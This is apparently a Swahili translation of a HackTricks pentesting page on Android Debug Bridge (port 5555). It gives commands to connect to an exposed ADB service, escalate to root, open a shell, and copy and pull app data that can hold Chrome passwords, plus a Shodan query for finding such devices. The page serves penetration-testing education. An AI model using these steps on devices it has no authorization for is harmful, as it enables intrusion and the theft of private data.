4 KiB
5555 - Android Debug Bridge
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud repos za github.
Taarifa Msingi
Kutoka nyaraka:
Android Debug Bridge (adb) ni zana ya amri yenye uwezo ambayo inakuwezesha kuwasiliana na kifaa. Amri ya adb inawezesha aina mbalimbali za vitendo vya kifaa, kama vile kusanikisha na kudukua programu, na inatoa upatikanaji wa kabati la Unix ambalo unaweza kutumia kutekeleza aina mbalimbali za amri kwenye kifaa.
Bandari ya chaguo: 5555.
PORT STATE SERVICE VERSION
5555/tcp open adb Android Debug Bridge device (name: msm8909; model: N3; device: msm8909)
Unganisha
Ikiwa utapata huduma ya ADB ikifanya kazi kwenye bandari ya kifaa na unaweza kuunganisha, unaweza kupata kikao ndani ya mfumo:
adb connect 10.10.10.10
adb root # Try to escalate to root
adb shell
Kwa amri zaidi za ADB angalia ukurasa ufuatao:
{% content-ref url="../mobile-pentesting/android-app-pentesting/adb-commands.md" %} adb-commands.md {% endcontent-ref %}
Pata data ya programu
Ili kupakua kabisa data ya programu, unaweza:
# From a root console
chmod 777 /data/data/com.package
cp -r /data/data/com.package /sdcard Note: Using ADB attacker cannot obtain data directly by using command " adb pull /data/data/com.package". He is compulsorily required to move data to Internal storage and then he can pull that data.
adb pull "/sdcard/com.package"
Unaweza kutumia mbinu hii ku kupata taarifa nyeti kama nywila za Chrome. Kwa maelezo zaidi kuhusu hili angalia habari na marejeo yaliyotolewa hapa.
Shodan
android debug bridge
Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)!
Njia nyingine za kusaidia HackTricks:
- Ikiwa unataka kuona kampuni yako ikionekana kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia MPANGO WA KUJIUNGA!
- Pata swag rasmi ya PEASS & HackTricks
- Gundua The PEASS Family, mkusanyiko wetu wa NFTs za kipekee
- Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @carlospolopm.
- Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye HackTricks na HackTricks Cloud github repos.